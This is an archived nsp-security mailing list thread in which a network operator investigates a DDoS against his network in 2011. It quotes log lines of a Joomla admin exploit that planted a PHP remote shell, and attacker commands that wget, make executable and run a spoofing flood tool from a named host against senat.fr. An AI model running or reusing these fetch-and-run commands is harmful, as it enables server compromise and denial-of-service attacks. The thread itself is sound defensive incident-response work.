[nsp-sec] UDP/80 flows to 89.185.38.26
David Freedman
david.freedman at uk.clara.net
Sun Dec 25 08:54:10 EST 2011
More information:
"
78.171.174.84 - - [25/Dec/2011:06:27:28 +0000] "GET
/administrator/index.php?option=com_templates&client=0&task=edit_source&id=
beez HTTP/1.1" 200
10206 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; tr;
rv:1.9.2.10) Gecko/20100914 Firefox/3.6.10 ( .NET CLR 3.5.30729; .NET4.0E)"
78.171.174.84 - - [25/Dec/2011:06:29:12 +0000] "POST
//administrator/index.php HTTP/1.1" 200 17631 "-" "-"
that seems to have uploaded /templates/beez/index.php which is a php
remote shell
then they ran: $shell = 'cd /dev/shm; wget www.artemisjoy.nl/w/iad.txt;
perl iad.txt; /bin/sh -i';
iad.txt is a perl script which just rund bbd against senat.fr
"
artemisjoy.nl also has IPv6 connectivity through fiberring.nl
Prefix: 2a00:ec8::/32
Prefix description: Fiberring
Country code: NL
Origin AS: 38930
Origin AS Name: FIBERRING FiberRing B.V.
RPKI status: No ROA found
On 25/12/2011 13:49, "David Freedman" <david.freedman at eu.clara.net> wrote:
>I may have struck some gold here, the customer in question is part of the
>french national government ,
>somebody on a private IRC channel I frequent found a machine of his
>compromised and attacking
>an fr .gov site (but not the same one)
>
>
>[11:47] <grifferz> system("wget artemisjoy.nl/w/ddb");^M
>[11:47] <grifferz> system("chmod 777 ddb");^M
>[11:47] <grifferz> system("./ddb www.senat.fr 80 127.0.0.1");^M
>
>
>Prefix: 91.217.56.0/23
>Prefix description: Tiscom Hosting route object
>Country code: NL
>Origin AS: 8455
>Origin AS Name: ATOM86-AS ATOM86 Autonomous System
>RPKI status: No ROA found
>
>$ wget artemisjoy.nl/w/ddb
>--2011-12-25 13:46:27-- http://artemisjoy.nl/w/ddb
>Resolving artemisjoy.nl... 91.217.56.94, 2a00:ec8:401:1:a044::1
>Connecting to artemisjoy.nl|91.217.56.94|:80... connected.
>HTTP request sent, awaiting response... 200 OK
>Length: 14303 (14K) [text/plain]
>Saving to: `ddb'
>
>100%[=====================================================================
>=
>==========================================================================
>=
>================>] 14,303 --.-K/s in 0.1s
>
>2011-12-25 13:46:27 (121 KB/s) - `ddb' saved [14303/14303]
>
>
>
>
>$ file ddb
>ddb: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically
>linked (uses shared libs), for GNU/Linux 2.2.5, not stripped
>
>$ strings ddb
>
><interesting bits>
>
>DDOS Coder by fastforce
>UNKNOWN SECURITY TEAM
>fastforce uHu Pink-Cashmere
>C* Made in TURKEY C*
>NE MUTLU TURKUM DIYENE !!!
>COMPILED AND HOSTED BY ALBANIA SECURITY CLAN
>www.albanianhaxorz.org /server -m irc.Gigachat.net 6667 -j #ASC
>>>> http://www.zone-h.org/en/defacements/filter/filter_defacer=ASC/ <<<
>
>Packeting %s, port %d spoofed as %s
>Unknown host : %s
>Usage : %s <hedef ip> <hedef port> <spoof ip>
>
>$ md5 ddb
>
>
>
>
>
>MD5 (ddb) = a3100823936173c6670ad0e011eaa413
>
>
>
>The guy is inspecting his netflow now to see if he can identify the source
>of the compromiseS.
>
>
>
>On 25/12/2011 13:36, "David Freedman" <david.freedman at eu.clara.net> wrote:
>
>>This attack is still ongoing, though thankfully we are mitigating it.
>>We are seeing quite a bit of traffic from OVH (AS16276/AS12322) are any
>>of
>>these folk on list?
>>
>>Dave.
>>
>>
>>On 25/12/2011 00:10, "David Freedman" <david.freedman at uk.clara.net>
>>wrote:
>>
>>>----------- nsp-security Confidential --------
>>>
>>>If anybody is seeing UDP/80 flows toward 89.185.38.26, can they please
>>>squash, we've had an attack ongoing for the past three hours.
>>>
>>>Thanks!
>>>
>>>David Freedman
>>>Claranet
>>>
>>>
>>>
>>>_______________________________________________
>>>nsp-security mailing list
>>>nsp-security at puck.nether.net
>>>https://puck.nether.net/mailman/listinfo/nsp-security
>>>
>>>Please do not Forward, CC, or BCC this E-mail outside of the
>>>nsp-security
>>>community. Confidentiality is essential for effective Internet security
>>>counter-measures.
>>>_______________________________________________
>>
>
More information about the nsp-security
mailing list